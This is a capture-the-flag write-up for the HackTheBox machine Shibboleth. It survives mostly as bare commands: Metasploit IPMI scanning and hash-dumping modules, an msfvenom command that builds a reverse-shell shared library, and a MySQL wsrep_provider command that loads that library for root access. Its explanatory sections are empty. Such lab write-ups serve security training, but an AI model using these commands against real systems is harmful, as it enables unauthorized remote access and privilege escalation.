HackTheBox — Shibboleth Writeup

Initial

Directory
Subdomain
use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_cipher_zero

Foothold

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

Getting Other User

Getting Root

find / -group ipmi-svc 2>/dev/null | tee results.txt
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o exploit.so
mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="[path_to_exploit]";

Final Thoughts

--

--

--

Penetration Tester, Ethical Hacker, CTF Player, and a Cat Lover

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Android DataBind plus Architecture Components: the good, the bad and the ugly

Stress Test: Digipus Application

Why we need unit tests?

How to setup Metabase with PostgreSQL and Docker Compose

4 Really Small Things That Say a Lot about You Hint: It’s not what you say.

Microservices Are Not a Silver Bullet. Learn Why.

Serverless Architecture — Explained For Non-Developers

How to Fix EXFAT_FILE_SYSTEM Error BSOD Windows 10?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ardian Danny

Ardian Danny

Penetration Tester, Ethical Hacker, CTF Player, and a Cat Lover

More from Medium

HackTheBox-Mantis

[Vulnhub] Kioptrix 1 Write-Up

Tryhackme crackme0019301933 writeup.

Thompsom THM Writeup